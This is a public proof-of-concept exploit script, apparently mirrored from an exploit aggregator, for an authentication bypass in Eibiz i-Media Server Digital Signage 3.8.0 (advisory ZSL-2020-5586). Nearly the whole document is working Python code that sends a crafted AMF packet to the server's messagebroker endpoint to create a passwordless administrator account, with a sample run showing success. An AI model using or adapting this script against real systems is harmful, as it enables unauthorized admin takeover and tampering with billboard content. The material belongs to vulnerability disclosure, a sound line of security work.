Share
## https://sploitus.com/exploit?id=ZSL-2020-5586
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# --Sending serialized object...
# --Replaying...
#
# ------------------------------------------------------
# Admin user 'waddup' successfully created. No password.
# ------------------------------------------------------
#
# =========================================================================================
#
# Tested on: Windows Server 2016
#            Windows Server 2012 R2
#            Windows Server 2008 R2
#            Apache Flex
#            Apache Tomcat/6.0.14
#            Apache-Coyote/1.1
#            BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:
    
    def __init__(self):
        self.ep = "/messagebroker/amf"
        self.agent = "CharlieChaplin"
        self.amfpacket = None
        self.bytecount = None
        self.bytesdata = None
        self.address = None
        self.headers = None
        self.usrname = None
        self.ende = None

    def usage(self):
        if len(sys.argv) != 3:
            self.me()
            msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
            brd = "-" * len(msg + "\x20")
            print("\n" + brd)
            print(msg)
            print("\x20Usage: ./i-media.py [ip] [username]")
            print(brd)
            exit(12)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            if not "http" in self.address:
                self.address = "http://{}".format(self.address)

    def amf(self):
        self.headers = {"User-Agent"      : self.agent,
                        "Accept"          : "*/*",
                        "Accept-Language" : "en-US,en;q=0.5",
                        "Accept-Encoding" : "gzip, deflate",
                        "Origin"          : self.address,
                        "Connection"      : "close",
                        "Referer"         : self.address + "/main.swf",
                        "Content-Type"    : "application/x-amf"}

        self.amfpacket  = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
        self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
        self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
        self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
        self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
        self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
        self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
        self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
        self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
        self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
        self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
        self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
        self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
        self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
        self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
        self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
        self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
        self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
        self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
        self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
        self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
        self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
        self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
        self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
        self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
        self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
        self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
        self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
        self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
        self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
        self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
        self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
        self.amfpacket += b"\x01\x06\x01\x06" ##################"
        self.bytecount  = len(self.usrname * 2) + 1
        self.bytesdata  = [self.bytecount]
        self.amfpacket += "".join(map(chr, self.bytesdata))
        self.amfpacket += (bytes(self.usrname.encode("utf-8")))
        self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
        self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
        self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
        self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
        self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
        self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
        self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
        self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
        self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
        self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
        self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
        self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
        self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
        self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
        self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
        self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
        self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"
        
        print("\n--Sending serialized object...")
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode("utf-8"))
        go.sleep(2)
        print("--Replaying...")
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode("utf-8"))
        self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
        print
        print("-" * len(self.ende))
        print(self.ende)
        print("-" * len(self.ende))

    def me(self):
        cc = """

                          /`,.,,,.                                              
                         :.......,,                                             
                         ,.........7                                            
                         ,.........$                                            
                         ......:=+=$                                            
                        I.....,,:~,.:                                           
                       $.?7IZDDNNN~.                                            
                        $$: 8D=:I D,                                            
                         D~,7NI7DNN                                             
                         DDD   NNN:                                              
                          D8.ININ;                                              
                          D8?7DZS                                                
                          .ZDNNND D                                             
                      S..,.~8?,N OO77                                           
                    N......,..$=77:+?=~8                                        
                  :......,::=.I8?:+=.=+~++                                      
                 =.......,:+$=+O:+==~~++++=                                     
               8...........~7D$::~..~====:++                                    
              I.............:+.....~~~=~:~+?                                    
            N,............. .+...,:~=+~~ :+=$                                   
           ;....... ......, .,....,:=+:,..~=?                                   
         Z,,......  :............,::~~=...===I                                  
        =.......$   Z...... =~,,,,.,:~,...,7~=                                  
       +.......     8.....,.=~~~:.~~~=:~ ..:$==                                 
       ,......      +,..,,:.=~:~+I:,+I=8:...=?~                                 
       ,.....,      =...,,,8+=,:~=~I=~~ N...:+?                                 
       ,.,.,.8      ,..,.,?DN~+~:=+::?D   ..:=?                                 
       8......      ,...7=Z$DN:?::=I~~$  =..,=+                                 
        ...,..D   ,....O88D,8D,:=:==+??   ...,:7                                
         ,....7   ,..:$Z8D8=8DZ~~=~+==?   :..:~+                                
         ......8D .. .... :?~8D:.:~~=++    ..,~II                               
         :....~D+:   . . .  ..,..==~===N   +,.,=$                               
          ,. DDND.......... .,...,===+=N    ..,+?Z                              
          DD  88 .......... ....,..~+=~N    ..,~?I                              
                .......   ,,.,,.:...=??     8..~=I$                             
                .......   ...,,,,. ,:~=      ..:=~?                             
                ........     ,.,,..,:..      I.:+?+D                            
                .......     .......,:,,8      ,..IN                             
                ........    .,.. ..,,:.:        :8N                             
                ........     ... ..,::,,        I+O                             
                ........      ......,:,.         O.ZN                           
                ........ . .    ...,,,,.          D+                            
                ............    ....,,,.          =                             
                .......   .      ....,,,          ?                             
                .......         .....,,,          7                             
                 ......         . ..,,,,          +                             
                :.....            ..,.,,          8                             
                :.......    =.  .....,,,N         8                             
                ~.......    D.  .....,,,D         8                             
                ~.......    D.  . ...,,,O         D                             
                =....            .....,,Z         ?`                              
                +......   .  :........,.$          +                            
                I......       ........,.7          =                            
                Z........     . . ....,,7          D                            
                N..... ... .    ........I          8                            
                 ..... ... ,    ........I          8                            
                 ......  . =   ..  .....I          7                            
                 :..  .  ..7  8... .....I          ?                            
                 Z..       D  ..    ....7          N         NND88OOOOOOO88DN   
                 O..      .   ..    ....O          O      D8OZ$77II777$$ZO8DN   
                  ... .  ..   .    .....N   NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN     
                   .,. ....O O..      ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N    
                    $..  ...88..     ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN    
                     ...     ...      ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N      
                   Z..       ~7.   . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N       
                   =.. ..   . 8.    .IIIIIIIIIIIIII~I7$Z8DN    NND88DDN         
                   ...      .?,     I777IIIIIIIII7$~O8N     NNNNN               
                  8....     .I.     ...7IIIIII7$Z8DD     NNNNN                  
           NND=....~,=~  ...+I .     . ..I$$ZO8DN  NN NNNNN                     
         N.+?~.~,=~=... ... $O..   . ...~:..=IINN   $NNN                        
           ?,:..:,.=N                I.....,,=I+   N8                           
                                        ~....,8                           

        """

        j = 0
        while j < len(cc):
            char = cc[j]
            sys.stdout.write(char)
            go.sleep(10.0 / 100000.0)
            j = j + 1

    def main(self):
        self.usage()
        self.amf()

if __name__ == '__main__':
    __CreateAdmin__().main()